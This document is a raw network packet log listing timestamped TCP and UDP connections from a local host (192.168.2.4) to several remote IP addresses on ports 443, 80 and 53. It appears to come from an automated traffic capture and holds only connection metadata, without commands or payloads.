Oct 28, 2024 06:47:19.067614079 CET	51917	443	192.168.2.4	172.217.16.193
Oct 28, 2024 06:47:19.067627907 CET	443	51917	172.217.16.193	192.168.2.4
Oct 28, 2024 06:47:19.067679882 CET	51917	443	192.168.2.4	172.217.16.193
Oct 28, 2024 06:47:19.076644897 CET	443	51917	172.217.16.193	192.168.2.4
Oct 28, 2024 06:47:19.076694965 CET	51917	443	192.168.2.4	172.217.16.193
Oct 28, 2024 06:47:19.076751947 CET	443	51917	172.217.16.193	192.168.2.4
Oct 28, 2024 06:47:19.076800108 CET	51917	443	192.168.2.4	172.217.16.193
Oct 28, 2024 06:47:19.085191965 CET	443	51917	172.217.16.193	192.168.2.4
Oct 28, 2024 06:47:19.085248947 CET	51917	443	192.168.2.4	172.217.16.193
Oct 28, 2024 06:47:19.085280895 CET	443	51917	172.217.16.193	192.168.2.4
Oct 28, 2024 06:47:19.085326910 CET	51917	443	192.168.2.4	172.217.16.193
Oct 28, 2024 06:47:19.093818903 CET	443	51917	172.217.16.193	192.168.2.4
Oct 28, 2024 06:47:19.093883991 CET	51917	443	192.168.2.4	172.217.16.193
Oct 28, 2024 06:47:19.093930960 CET	443	51917	172.217.16.193	192.168.2.4
Oct 28, 2024 06:47:19.093977928 CET	51917	443	192.168.2.4	172.217.16.193
Oct 28, 2024 06:47:19.159643888 CET	443	51917	172.217.16.193	192.168.2.4
Oct 28, 2024 06:47:19.159713984 CET	51917	443	192.168.2.4	172.217.16.193
Oct 28, 2024 06:47:19.159832001 CET	443	51917	172.217.16.193	192.168.2.4
Oct 28, 2024 06:47:19.159894943 CET	51917	443	192.168.2.4	172.217.16.193
Oct 28, 2024 06:47:19.159946918 CET	443	51917	172.217.16.193	192.168.2.4
Oct 28, 2024 06:47:19.160016060 CET	51917	443	192.168.2.4	172.217.16.193
Oct 28, 2024 06:47:19.160628080 CET	443	51917	172.217.16.193	192.168.2.4
Oct 28, 2024 06:47:19.160692930 CET	51917	443	192.168.2.4	172.217.16.193
Oct 28, 2024 06:47:19.160718918 CET	443	51917	172.217.16.193	192.168.2.4
Oct 28, 2024 06:47:19.160769939 CET	51917	443	192.168.2.4	172.217.16.193
Oct 28, 2024 06:47:19.160821915 CET	443	51917	172.217.16.193	192.168.2.4
Oct 28, 2024 06:47:19.160875082 CET	51917	443	192.168.2.4	172.217.16.193
Oct 28, 2024 06:47:19.161487103 CET	443	51917	172.217.16.193	192.168.2.4
Oct 28, 2024 06:47:19.161537886 CET	51917	443	192.168.2.4	172.217.16.193
Oct 28, 2024 06:47:19.161607027 CET	443	51917	172.217.16.193	192.168.2.4
Oct 28, 2024 06:47:19.161657095 CET	51917	443	192.168.2.4	172.217.16.193
Oct 28, 2024 06:47:19.162785053 CET	443	51917	172.217.16.193	192.168.2.4
Oct 28, 2024 06:47:19.162842989 CET	51917	443	192.168.2.4	172.217.16.193
Oct 28, 2024 06:47:19.162955999 CET	443	51917	172.217.16.193	192.168.2.4
Oct 28, 2024 06:47:19.163012028 CET	51917	443	192.168.2.4	172.217.16.193
Oct 28, 2024 06:47:19.163069963 CET	443	51917	172.217.16.193	192.168.2.4
Oct 28, 2024 06:47:19.163126945 CET	51917	443	192.168.2.4	172.217.16.193
Oct 28, 2024 06:47:19.167074919 CET	443	51917	172.217.16.193	192.168.2.4
Oct 28, 2024 06:47:19.167150021 CET	51917	443	192.168.2.4	172.217.16.193
Oct 28, 2024 06:47:19.167300940 CET	443	51917	172.217.16.193	192.168.2.4
Oct 28, 2024 06:47:19.167370081 CET	51917	443	192.168.2.4	172.217.16.193
Oct 28, 2024 06:47:19.167413950 CET	443	51917	172.217.16.193	192.168.2.4
Oct 28, 2024 06:47:19.167470932 CET	51917	443	192.168.2.4	172.217.16.193
Oct 28, 2024 06:47:19.167546034 CET	443	51917	172.217.16.193	192.168.2.4
Oct 28, 2024 06:47:19.167597055 CET	51917	443	192.168.2.4	172.217.16.193
Oct 28, 2024 06:47:19.175806999 CET	443	51917	172.217.16.193	192.168.2.4
Oct 28, 2024 06:47:19.176040888 CET	443	51917	172.217.16.193	192.168.2.4
Oct 28, 2024 06:47:19.176105976 CET	51917	443	192.168.2.4	172.217.16.193
Oct 28, 2024 06:47:19.176122904 CET	443	51917	172.217.16.193	192.168.2.4
Oct 28, 2024 06:47:19.176254034 CET	443	51917	172.217.16.193	192.168.2.4
Oct 28, 2024 06:47:19.176322937 CET	51917	443	192.168.2.4	172.217.16.193
Oct 28, 2024 06:47:19.176337004 CET	443	51917	172.217.16.193	192.168.2.4
Oct 28, 2024 06:47:19.176388979 CET	51917	443	192.168.2.4	172.217.16.193
Oct 28, 2024 06:47:19.176400900 CET	443	51917	172.217.16.193	192.168.2.4
Oct 28, 2024 06:47:19.177927971 CET	51917	443	192.168.2.4	172.217.16.193
Oct 28, 2024 06:47:19.184705973 CET	443	51917	172.217.16.193	192.168.2.4
Oct 28, 2024 06:47:19.186172962 CET	51917	443	192.168.2.4	172.217.16.193
Oct 28, 2024 06:47:19.186187029 CET	443	51917	172.217.16.193	192.168.2.4
Oct 28, 2024 06:47:19.186233044 CET	51917	443	192.168.2.4	172.217.16.193
Oct 28, 2024 06:47:19.186733007 CET	443	51917	172.217.16.193	192.168.2.4
Oct 28, 2024 06:47:19.186784983 CET	51917	443	192.168.2.4	172.217.16.193
Oct 28, 2024 06:47:19.193598032 CET	443	51917	172.217.16.193	192.168.2.4
Oct 28, 2024 06:47:19.193811893 CET	443	51917	172.217.16.193	192.168.2.4
Oct 28, 2024 06:47:19.193870068 CET	51917	443	192.168.2.4	172.217.16.193
Oct 28, 2024 06:47:19.193885088 CET	443	51917	172.217.16.193	192.168.2.4
Oct 28, 2024 06:47:19.194022894 CET	51917	443	192.168.2.4	172.217.16.193
Oct 28, 2024 06:47:19.198177099 CET	443	51917	172.217.16.193	192.168.2.4
Oct 28, 2024 06:47:19.202193022 CET	51917	443	192.168.2.4	172.217.16.193
Oct 28, 2024 06:47:19.202251911 CET	443	51917	172.217.16.193	192.168.2.4
Oct 28, 2024 06:47:19.202297926 CET	51917	443	192.168.2.4	172.217.16.193
Oct 28, 2024 06:47:19.203844070 CET	443	51917	172.217.16.193	192.168.2.4
Oct 28, 2024 06:47:19.203900099 CET	51917	443	192.168.2.4	172.217.16.193
Oct 28, 2024 06:47:19.203938007 CET	443	51917	172.217.16.193	192.168.2.4
Oct 28, 2024 06:47:19.204067945 CET	51917	443	192.168.2.4	172.217.16.193
Oct 28, 2024 06:47:19.209654093 CET	443	51917	172.217.16.193	192.168.2.4
Oct 28, 2024 06:47:19.210037947 CET	51917	443	192.168.2.4	172.217.16.193
Oct 28, 2024 06:47:19.210846901 CET	443	51917	172.217.16.193	192.168.2.4
Oct 28, 2024 06:47:19.210901976 CET	51917	443	192.168.2.4	172.217.16.193
Oct 28, 2024 06:47:19.215334892 CET	443	51917	172.217.16.193	192.168.2.4
Oct 28, 2024 06:47:19.218599081 CET	51917	443	192.168.2.4	172.217.16.193
Oct 28, 2024 06:47:19.218612909 CET	443	51917	172.217.16.193	192.168.2.4
Oct 28, 2024 06:47:19.218666077 CET	51917	443	192.168.2.4	172.217.16.193
Oct 28, 2024 06:47:19.220864058 CET	443	51917	172.217.16.193	192.168.2.4
Oct 28, 2024 06:47:19.220917940 CET	51917	443	192.168.2.4	172.217.16.193
Oct 28, 2024 06:47:19.276767015 CET	443	51917	172.217.16.193	192.168.2.4
Oct 28, 2024 06:47:19.276979923 CET	443	51917	172.217.16.193	192.168.2.4
Oct 28, 2024 06:47:19.277070045 CET	443	51917	172.217.16.193	192.168.2.4
Oct 28, 2024 06:47:19.277190924 CET	51917	443	192.168.2.4	172.217.16.193
Oct 28, 2024 06:47:19.277219057 CET	443	51917	172.217.16.193	192.168.2.4
Oct 28, 2024 06:47:19.277244091 CET	51917	443	192.168.2.4	172.217.16.193
Oct 28, 2024 06:47:19.277326107 CET	51917	443	192.168.2.4	172.217.16.193
Oct 28, 2024 06:47:19.277339935 CET	443	51917	172.217.16.193	192.168.2.4
Oct 28, 2024 06:47:19.277825117 CET	443	51917	172.217.16.193	192.168.2.4
Oct 28, 2024 06:47:19.277888060 CET	51917	443	192.168.2.4	172.217.16.193
Oct 28, 2024 06:47:19.277903080 CET	443	51917	172.217.16.193	192.168.2.4
Oct 28, 2024 06:47:19.278007030 CET	443	51917	172.217.16.193	192.168.2.4
Oct 28, 2024 06:47:19.278067112 CET	51917	443	192.168.2.4	172.217.16.193
Oct 28, 2024 06:47:19.278079987 CET	443	51917	172.217.16.193	192.168.2.4
Oct 28, 2024 06:47:19.278131008 CET	51917	443	192.168.2.4	172.217.16.193
Oct 28, 2024 06:47:19.278142929 CET	443	51917	172.217.16.193	192.168.2.4
Oct 28, 2024 06:47:19.278342962 CET	51917	443	192.168.2.4	172.217.16.193
Oct 28, 2024 06:47:19.278356075 CET	443	51917	172.217.16.193	192.168.2.4
Oct 28, 2024 06:47:19.278403044 CET	51917	443	192.168.2.4	172.217.16.193
Oct 28, 2024 06:47:19.278697968 CET	443	51917	172.217.16.193	192.168.2.4
Oct 28, 2024 06:47:19.278759956 CET	51917	443	192.168.2.4	172.217.16.193
Oct 28, 2024 06:47:19.278812885 CET	443	51917	172.217.16.193	192.168.2.4
Oct 28, 2024 06:47:19.278863907 CET	51917	443	192.168.2.4	172.217.16.193
Oct 28, 2024 06:47:19.278938055 CET	443	51917	172.217.16.193	192.168.2.4
Oct 28, 2024 06:47:19.278985023 CET	51917	443	192.168.2.4	172.217.16.193
Oct 28, 2024 06:47:19.279027939 CET	443	51917	172.217.16.193	192.168.2.4
Oct 28, 2024 06:47:19.279077053 CET	51917	443	192.168.2.4	172.217.16.193
Oct 28, 2024 06:47:19.279114962 CET	443	51917	172.217.16.193	192.168.2.4
Oct 28, 2024 06:47:19.279162884 CET	51917	443	192.168.2.4	172.217.16.193
Oct 28, 2024 06:47:19.279669046 CET	443	51917	172.217.16.193	192.168.2.4
Oct 28, 2024 06:47:19.279723883 CET	51917	443	192.168.2.4	172.217.16.193
Oct 28, 2024 06:47:19.279779911 CET	443	51917	172.217.16.193	192.168.2.4
Oct 28, 2024 06:47:19.279824972 CET	51917	443	192.168.2.4	172.217.16.193
Oct 28, 2024 06:47:19.280076981 CET	443	51917	172.217.16.193	192.168.2.4
Oct 28, 2024 06:47:19.280129910 CET	51917	443	192.168.2.4	172.217.16.193
Oct 28, 2024 06:47:19.280160904 CET	443	51917	172.217.16.193	192.168.2.4
Oct 28, 2024 06:47:19.280215025 CET	51917	443	192.168.2.4	172.217.16.193
Oct 28, 2024 06:47:19.280498981 CET	443	51917	172.217.16.193	192.168.2.4
Oct 28, 2024 06:47:19.280551910 CET	51917	443	192.168.2.4	172.217.16.193
Oct 28, 2024 06:47:19.280622005 CET	443	51917	172.217.16.193	192.168.2.4
Oct 28, 2024 06:47:19.280673981 CET	51917	443	192.168.2.4	172.217.16.193
Oct 28, 2024 06:47:19.282066107 CET	443	51917	172.217.16.193	192.168.2.4
Oct 28, 2024 06:47:19.286001921 CET	51917	443	192.168.2.4	172.217.16.193
Oct 28, 2024 06:47:19.286015034 CET	443	51917	172.217.16.193	192.168.2.4
Oct 28, 2024 06:47:19.286071062 CET	51917	443	192.168.2.4	172.217.16.193
Oct 28, 2024 06:47:19.287079096 CET	443	51917	172.217.16.193	192.168.2.4
Oct 28, 2024 06:47:19.287139893 CET	51917	443	192.168.2.4	172.217.16.193
Oct 28, 2024 06:47:19.287172079 CET	443	51917	172.217.16.193	192.168.2.4
Oct 28, 2024 06:47:19.287225962 CET	51917	443	192.168.2.4	172.217.16.193
Oct 28, 2024 06:47:19.299496889 CET	443	51917	172.217.16.193	192.168.2.4
Oct 28, 2024 06:47:19.299666882 CET	443	51917	172.217.16.193	192.168.2.4
Oct 28, 2024 06:47:19.299736023 CET	51917	443	192.168.2.4	172.217.16.193
Oct 28, 2024 06:47:19.299750090 CET	443	51917	172.217.16.193	192.168.2.4
Oct 28, 2024 06:47:19.300137043 CET	443	51917	172.217.16.193	192.168.2.4
Oct 28, 2024 06:47:19.300232887 CET	443	51917	172.217.16.193	192.168.2.4
Oct 28, 2024 06:47:19.300287008 CET	51917	443	192.168.2.4	172.217.16.193
Oct 28, 2024 06:47:19.300302982 CET	443	51917	172.217.16.193	192.168.2.4
Oct 28, 2024 06:47:19.300342083 CET	51917	443	192.168.2.4	172.217.16.193
Oct 28, 2024 06:47:19.300365925 CET	51917	443	192.168.2.4	172.217.16.193
Oct 28, 2024 06:47:19.303142071 CET	443	51917	172.217.16.193	192.168.2.4
Oct 28, 2024 06:47:19.305995941 CET	51917	443	192.168.2.4	172.217.16.193
Oct 28, 2024 06:47:19.306009054 CET	443	51917	172.217.16.193	192.168.2.4
Oct 28, 2024 06:47:19.306061029 CET	51917	443	192.168.2.4	172.217.16.193
Oct 28, 2024 06:47:19.306099892 CET	443	51917	172.217.16.193	192.168.2.4
Oct 28, 2024 06:47:19.309113979 CET	443	51917	172.217.16.193	192.168.2.4
Oct 28, 2024 06:47:19.309180021 CET	51917	443	192.168.2.4	172.217.16.193
Oct 28, 2024 06:47:19.309194088 CET	443	51917	172.217.16.193	192.168.2.4
Oct 28, 2024 06:47:19.309268951 CET	443	51917	172.217.16.193	192.168.2.4
Oct 28, 2024 06:47:19.309386015 CET	51917	443	192.168.2.4	172.217.16.193
Oct 28, 2024 06:47:19.309400082 CET	443	51917	172.217.16.193	192.168.2.4
Oct 28, 2024 06:47:19.309448957 CET	51917	443	192.168.2.4	172.217.16.193
Oct 28, 2024 06:47:19.309556007 CET	51917	443	192.168.2.4	172.217.16.193
Oct 28, 2024 06:47:19.309644938 CET	443	51917	172.217.16.193	192.168.2.4
Oct 28, 2024 06:47:19.309705973 CET	51917	443	192.168.2.4	172.217.16.193
Oct 28, 2024 06:47:19.932080030 CET	51943	80	192.168.2.4	158.101.44.242
Oct 28, 2024 06:47:19.937406063 CET	80	51943	158.101.44.242	192.168.2.4
Oct 28, 2024 06:47:19.937489033 CET	51943	80	192.168.2.4	158.101.44.242
Oct 28, 2024 06:47:19.937700987 CET	51943	80	192.168.2.4	158.101.44.242
Oct 28, 2024 06:47:19.942950964 CET	80	51943	158.101.44.242	192.168.2.4
Oct 28, 2024 06:47:20.583868027 CET	80	51943	158.101.44.242	192.168.2.4
Oct 28, 2024 06:47:20.589113951 CET	51943	80	192.168.2.4	158.101.44.242
Oct 28, 2024 06:47:20.594472885 CET	80	51943	158.101.44.242	192.168.2.4
Oct 28, 2024 06:47:20.737340927 CET	80	51943	158.101.44.242	192.168.2.4
Oct 28, 2024 06:47:20.831783056 CET	51943	80	192.168.2.4	158.101.44.242
Oct 28, 2024 06:47:21.074486017 CET	51954	443	192.168.2.4	188.114.97.3
Oct 28, 2024 06:47:21.074510098 CET	443	51954	188.114.97.3	192.168.2.4
Oct 28, 2024 06:47:21.074588060 CET	51954	443	192.168.2.4	188.114.97.3
Oct 28, 2024 06:47:21.076383114 CET	51954	443	192.168.2.4	188.114.97.3
Oct 28, 2024 06:47:21.076406002 CET	443	51954	188.114.97.3	192.168.2.4
Oct 28, 2024 06:47:21.709203959 CET	443	51954	188.114.97.3	192.168.2.4
Oct 28, 2024 06:47:21.709476948 CET	51954	443	192.168.2.4	188.114.97.3
Oct 28, 2024 06:47:21.713382959 CET	51954	443	192.168.2.4	188.114.97.3
Oct 28, 2024 06:47:21.713395119 CET	443	51954	188.114.97.3	192.168.2.4
Oct 28, 2024 06:47:21.713849068 CET	443	51954	188.114.97.3	192.168.2.4
Oct 28, 2024 06:47:21.722306013 CET	51954	443	192.168.2.4	188.114.97.3
Oct 28, 2024 06:47:21.763374090 CET	443	51954	188.114.97.3	192.168.2.4
Oct 28, 2024 06:47:21.860008955 CET	443	51954	188.114.97.3	192.168.2.4
Oct 28, 2024 06:47:21.860157013 CET	443	51954	188.114.97.3	192.168.2.4
Oct 28, 2024 06:47:21.860224009 CET	51954	443	192.168.2.4	188.114.97.3
Oct 28, 2024 06:47:21.864732981 CET	51954	443	192.168.2.4	188.114.97.3
Oct 28, 2024 06:47:21.870565891 CET	51943	80	192.168.2.4	158.101.44.242
Oct 28, 2024 06:47:21.875988960 CET	80	51943	158.101.44.242	192.168.2.4
Oct 28, 2024 06:47:22.018959045 CET	80	51943	158.101.44.242	192.168.2.4
Oct 28, 2024 06:47:22.031091928 CET	51960	443	192.168.2.4	188.114.97.3
Oct 28, 2024 06:47:22.031121016 CET	443	51960	188.114.97.3	192.168.2.4
Oct 28, 2024 06:47:22.031222105 CET	51960	443	192.168.2.4	188.114.97.3
Oct 28, 2024 06:47:22.031522036 CET	51960	443	192.168.2.4	188.114.97.3
Oct 28, 2024 06:47:22.031536102 CET	443	51960	188.114.97.3	192.168.2.4
Oct 28, 2024 06:47:22.066174030 CET	51943	80	192.168.2.4	158.101.44.242
Oct 28, 2024 06:47:22.667310953 CET	443	51960	188.114.97.3	192.168.2.4
Oct 28, 2024 06:47:22.669056892 CET	51960	443	192.168.2.4	188.114.97.3
Oct 28, 2024 06:47:22.669079065 CET	443	51960	188.114.97.3	192.168.2.4
Oct 28, 2024 06:47:23.846023083 CET	443	51960	188.114.97.3	192.168.2.4
Oct 28, 2024 06:47:23.846196890 CET	443	51960	188.114.97.3	192.168.2.4
Oct 28, 2024 06:47:23.846249104 CET	51960	443	192.168.2.4	188.114.97.3
Oct 28, 2024 06:47:23.846977949 CET	51960	443	192.168.2.4	188.114.97.3
Oct 28, 2024 06:47:23.850909948 CET	51943	80	192.168.2.4	158.101.44.242
Oct 28, 2024 06:47:23.852603912 CET	51966	80	192.168.2.4	158.101.44.242
Oct 28, 2024 06:47:23.856762886 CET	80	51943	158.101.44.242	192.168.2.4
Oct 28, 2024 06:47:23.856821060 CET	51943	80	192.168.2.4	158.101.44.242
Oct 28, 2024 06:47:23.858134985 CET	80	51966	158.101.44.242	192.168.2.4
Oct 28, 2024 06:47:23.858197927 CET	51966	80	192.168.2.4	158.101.44.242
Oct 28, 2024 06:47:23.858371973 CET	51966	80	192.168.2.4	158.101.44.242
Oct 28, 2024 06:47:23.863823891 CET	80	51966	158.101.44.242	192.168.2.4
Oct 28, 2024 06:47:24.495786905 CET	80	51966	158.101.44.242	192.168.2.4
Oct 28, 2024 06:47:24.496126890 CET	51966	80	192.168.2.4	158.101.44.242
Oct 28, 2024 06:47:24.497018099 CET	51967	443	192.168.2.4	188.114.97.3
Oct 28, 2024 06:47:24.497096062 CET	443	51967	188.114.97.3	192.168.2.4
Oct 28, 2024 06:47:24.497179985 CET	51967	443	192.168.2.4	188.114.97.3
Oct 28, 2024 06:47:24.497406960 CET	51967	443	192.168.2.4	188.114.97.3
Oct 28, 2024 06:47:24.497436047 CET	443	51967	188.114.97.3	192.168.2.4
Oct 28, 2024 06:47:24.501878977 CET	80	51966	158.101.44.242	192.168.2.4
Oct 28, 2024 06:47:24.501945019 CET	51966	80	192.168.2.4	158.101.44.242
Oct 28, 2024 06:47:25.123953104 CET	443	51967	188.114.97.3	192.168.2.4
Oct 28, 2024 06:47:25.125854015 CET	51967	443	192.168.2.4	188.114.97.3
Oct 28, 2024 06:47:25.125933886 CET	443	51967	188.114.97.3	192.168.2.4
Oct 28, 2024 06:47:25.265706062 CET	443	51967	188.114.97.3	192.168.2.4
Oct 28, 2024 06:47:25.265880108 CET	443	51967	188.114.97.3	192.168.2.4
Oct 28, 2024 06:47:25.266026974 CET	51967	443	192.168.2.4	188.114.97.3
Oct 28, 2024 06:47:25.266220093 CET	51967	443	192.168.2.4	188.114.97.3
Oct 28, 2024 06:47:25.270665884 CET	51973	80	192.168.2.4	158.101.44.242
Oct 28, 2024 06:47:25.276067019 CET	80	51973	158.101.44.242	192.168.2.4
Oct 28, 2024 06:47:25.276179075 CET	51973	80	192.168.2.4	158.101.44.242
Oct 28, 2024 06:47:25.276262999 CET	51973	80	192.168.2.4	158.101.44.242
Oct 28, 2024 06:47:25.281575918 CET	80	51973	158.101.44.242	192.168.2.4
Oct 28, 2024 06:47:25.914880991 CET	80	51973	158.101.44.242	192.168.2.4
Oct 28, 2024 06:47:25.916213036 CET	51979	443	192.168.2.4	188.114.97.3
Oct 28, 2024 06:47:25.916245937 CET	443	51979	188.114.97.3	192.168.2.4
Oct 28, 2024 06:47:25.916306973 CET	51979	443	192.168.2.4	188.114.97.3
Oct 28, 2024 06:47:25.916570902 CET	51979	443	192.168.2.4	188.114.97.3
Oct 28, 2024 06:47:25.916582108 CET	443	51979	188.114.97.3	192.168.2.4
Oct 28, 2024 06:47:25.956798077 CET	51973	80	192.168.2.4	158.101.44.242
Oct 28, 2024 06:47:26.528105021 CET	443	51979	188.114.97.3	192.168.2.4
Oct 28, 2024 06:47:26.529925108 CET	51979	443	192.168.2.4	188.114.97.3
Oct 28, 2024 06:47:26.529942036 CET	443	51979	188.114.97.3	192.168.2.4
Oct 28, 2024 06:47:26.668926001 CET	443	51979	188.114.97.3	192.168.2.4
Oct 28, 2024 06:47:26.669095039 CET	443	51979	188.114.97.3	192.168.2.4
Oct 28, 2024 06:47:26.669353008 CET	51979	443	192.168.2.4	188.114.97.3
Oct 28, 2024 06:47:26.669714928 CET	51979	443	192.168.2.4	188.114.97.3
Oct 28, 2024 06:47:26.673420906 CET	51973	80	192.168.2.4	158.101.44.242
Oct 28, 2024 06:47:26.674627066 CET	51985	80	192.168.2.4	158.101.44.242
Oct 28, 2024 06:47:26.679042101 CET	80	51973	158.101.44.242	192.168.2.4
Oct 28, 2024 06:47:26.679121971 CET	51973	80	192.168.2.4	158.101.44.242
Oct 28, 2024 06:47:26.680008888 CET	80	51985	158.101.44.242	192.168.2.4
Oct 28, 2024 06:47:26.680083990 CET	51985	80	192.168.2.4	158.101.44.242
Oct 28, 2024 06:47:26.680152893 CET	51985	80	192.168.2.4	158.101.44.242
Oct 28, 2024 06:47:26.685504913 CET	80	51985	158.101.44.242	192.168.2.4
Oct 28, 2024 06:47:28.170763969 CET	80	51985	158.101.44.242	192.168.2.4
Oct 28, 2024 06:47:28.172036886 CET	51995	443	192.168.2.4	188.114.97.3
Oct 28, 2024 06:47:28.172139883 CET	443	51995	188.114.97.3	192.168.2.4
Oct 28, 2024 06:47:28.172230959 CET	51995	443	192.168.2.4	188.114.97.3
Oct 28, 2024 06:47:28.172418118 CET	51995	443	192.168.2.4	188.114.97.3
Oct 28, 2024 06:47:28.172447920 CET	443	51995	188.114.97.3	192.168.2.4
Oct 28, 2024 06:47:28.222479105 CET	51985	80	192.168.2.4	158.101.44.242
Oct 28, 2024 06:47:28.788654089 CET	443	51995	188.114.97.3	192.168.2.4
Oct 28, 2024 06:47:28.791928053 CET	51995	443	192.168.2.4	188.114.97.3
Oct 28, 2024 06:47:28.792002916 CET	443	51995	188.114.97.3	192.168.2.4
Oct 28, 2024 06:47:28.933075905 CET	443	51995	188.114.97.3	192.168.2.4
Oct 28, 2024 06:47:28.933235884 CET	443	51995	188.114.97.3	192.168.2.4
Oct 28, 2024 06:47:28.933320045 CET	51995	443	192.168.2.4	188.114.97.3
Oct 28, 2024 06:47:28.940546036 CET	51995	443	192.168.2.4	188.114.97.3
Oct 28, 2024 06:47:29.126241922 CET	51985	80	192.168.2.4	158.101.44.242
Oct 28, 2024 06:47:29.127346039 CET	51998	80	192.168.2.4	158.101.44.242
Oct 28, 2024 06:47:29.131966114 CET	80	51985	158.101.44.242	192.168.2.4
Oct 28, 2024 06:47:29.132021904 CET	51985	80	192.168.2.4	158.101.44.242
Oct 28, 2024 06:47:29.132653952 CET	80	51998	158.101.44.242	192.168.2.4
Oct 28, 2024 06:47:29.132715940 CET	51998	80	192.168.2.4	158.101.44.242
Oct 28, 2024 06:47:29.132842064 CET	51998	80	192.168.2.4	158.101.44.242
Oct 28, 2024 06:47:29.138155937 CET	80	51998	158.101.44.242	192.168.2.4
Oct 28, 2024 06:47:30.018893003 CET	80	51998	158.101.44.242	192.168.2.4
Oct 28, 2024 06:47:30.019969940 CET	52004	443	192.168.2.4	188.114.97.3
Oct 28, 2024 06:47:30.020028114 CET	443	52004	188.114.97.3	192.168.2.4
Oct 28, 2024 06:47:30.020095110 CET	52004	443	192.168.2.4	188.114.97.3
Oct 28, 2024 06:47:30.020283937 CET	52004	443	192.168.2.4	188.114.97.3
Oct 28, 2024 06:47:30.020312071 CET	443	52004	188.114.97.3	192.168.2.4
Oct 28, 2024 06:47:30.066180944 CET	51998	80	192.168.2.4	158.101.44.242
Oct 28, 2024 06:47:30.642091036 CET	443	52004	188.114.97.3	192.168.2.4
Oct 28, 2024 06:47:30.643659115 CET	52004	443	192.168.2.4	188.114.97.3
Oct 28, 2024 06:47:30.643707991 CET	443	52004	188.114.97.3	192.168.2.4
Oct 28, 2024 06:47:30.785104990 CET	443	52004	188.114.97.3	192.168.2.4
Oct 28, 2024 06:47:30.785254002 CET	443	52004	188.114.97.3	192.168.2.4
Oct 28, 2024 06:47:30.785448074 CET	52004	443	192.168.2.4	188.114.97.3
Oct 28, 2024 06:47:30.785520077 CET	52004	443	192.168.2.4	188.114.97.3
Oct 28, 2024 06:47:30.788404942 CET	51998	80	192.168.2.4	158.101.44.242
Oct 28, 2024 06:47:30.789571047 CET	52009	80	192.168.2.4	158.101.44.242
Oct 28, 2024 06:47:30.793992996 CET	80	51998	158.101.44.242	192.168.2.4
Oct 28, 2024 06:47:30.794066906 CET	51998	80	192.168.2.4	158.101.44.242
Oct 28, 2024 06:47:30.794883013 CET	80	52009	158.101.44.242	192.168.2.4
Oct 28, 2024 06:47:30.794969082 CET	52009	80	192.168.2.4	158.101.44.242
Oct 28, 2024 06:47:30.795032978 CET	52009	80	192.168.2.4	158.101.44.242
Oct 28, 2024 06:47:30.800365925 CET	80	52009	158.101.44.242	192.168.2.4
Oct 28, 2024 06:47:31.445050001 CET	80	52009	158.101.44.242	192.168.2.4
Oct 28, 2024 06:47:31.471610069 CET	52015	443	192.168.2.4	188.114.97.3
Oct 28, 2024 06:47:31.471681118 CET	443	52015	188.114.97.3	192.168.2.4
Oct 28, 2024 06:47:31.471803904 CET	52015	443	192.168.2.4	188.114.97.3
Oct 28, 2024 06:47:31.472022057 CET	52015	443	192.168.2.4	188.114.97.3
Oct 28, 2024 06:47:31.472062111 CET	443	52015	188.114.97.3	192.168.2.4
Oct 28, 2024 06:47:31.488065958 CET	52009	80	192.168.2.4	158.101.44.242
Oct 28, 2024 06:47:32.086922884 CET	443	52015	188.114.97.3	192.168.2.4
Oct 28, 2024 06:47:32.088295937 CET	52015	443	192.168.2.4	188.114.97.3
Oct 28, 2024 06:47:32.088370085 CET	443	52015	188.114.97.3	192.168.2.4
Oct 28, 2024 06:47:32.234626055 CET	443	52015	188.114.97.3	192.168.2.4
Oct 28, 2024 06:47:32.234778881 CET	443	52015	188.114.97.3	192.168.2.4
Oct 28, 2024 06:47:32.234908104 CET	52015	443	192.168.2.4	188.114.97.3
Oct 28, 2024 06:47:32.235266924 CET	52015	443	192.168.2.4	188.114.97.3
Oct 28, 2024 06:47:32.238096952 CET	52009	80	192.168.2.4	158.101.44.242
Oct 28, 2024 06:47:32.239157915 CET	52021	80	192.168.2.4	158.101.44.242
Oct 28, 2024 06:47:32.244102001 CET	80	52009	158.101.44.242	192.168.2.4
Oct 28, 2024 06:47:32.244182110 CET	52009	80	192.168.2.4	158.101.44.242
Oct 28, 2024 06:47:32.244729042 CET	80	52021	158.101.44.242	192.168.2.4
Oct 28, 2024 06:47:32.244813919 CET	52021	80	192.168.2.4	158.101.44.242
Oct 28, 2024 06:47:32.244872093 CET	52021	80	192.168.2.4	158.101.44.242
Oct 28, 2024 06:47:32.250128031 CET	80	52021	158.101.44.242	192.168.2.4
Oct 28, 2024 06:47:32.884517908 CET	80	52021	158.101.44.242	192.168.2.4
Oct 28, 2024 06:47:32.885570049 CET	52026	443	192.168.2.4	188.114.97.3
Oct 28, 2024 06:47:32.885598898 CET	443	52026	188.114.97.3	192.168.2.4
Oct 28, 2024 06:47:32.885663986 CET	52026	443	192.168.2.4	188.114.97.3
Oct 28, 2024 06:47:32.885864019 CET	52026	443	192.168.2.4	188.114.97.3
Oct 28, 2024 06:47:32.885880947 CET	443	52026	188.114.97.3	192.168.2.4
Oct 28, 2024 06:47:32.925561905 CET	52021	80	192.168.2.4	158.101.44.242
Oct 28, 2024 06:47:33.489042997 CET	443	52026	188.114.97.3	192.168.2.4
Oct 28, 2024 06:47:33.490314960 CET	52026	443	192.168.2.4	188.114.97.3
Oct 28, 2024 06:47:33.490331888 CET	443	52026	188.114.97.3	192.168.2.4
Oct 28, 2024 06:47:33.629518032 CET	443	52026	188.114.97.3	192.168.2.4
Oct 28, 2024 06:47:33.629652023 CET	443	52026	188.114.97.3	192.168.2.4
Oct 28, 2024 06:47:33.629698992 CET	52026	443	192.168.2.4	188.114.97.3
Oct 28, 2024 06:47:33.629916906 CET	52026	443	192.168.2.4	188.114.97.3
Oct 28, 2024 06:47:33.716299057 CET	52021	80	192.168.2.4	158.101.44.242

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 28, 2024 06:46:15.807872057 CET	53	49859	1.1.1.1	192.168.2.4
Oct 28, 2024 06:47:13.577642918 CET	64000	53	192.168.2.4	1.1.1.1
Oct 28, 2024 06:47:13.585413933 CET	53	64000	1.1.1.1	192.168.2.4
Oct 28, 2024 06:47:14.928093910 CET	50300	53	192.168.2.4	1.1.1.1
Oct 28, 2024 06:47:14.935728073 CET	53	50300	1.1.1.1	192.168.2.4
Oct 28, 2024 06:47:19.916939974 CET	63337	53	192.168.2.4	1.1.1.1
Oct 28, 2024 06:47:19.924904108 CET	53	63337	1.1.1.1	192.168.2.4
Oct 28, 2024 06:47:21.065531969 CET	52990	53	192.168.2.4	1.1.1.1
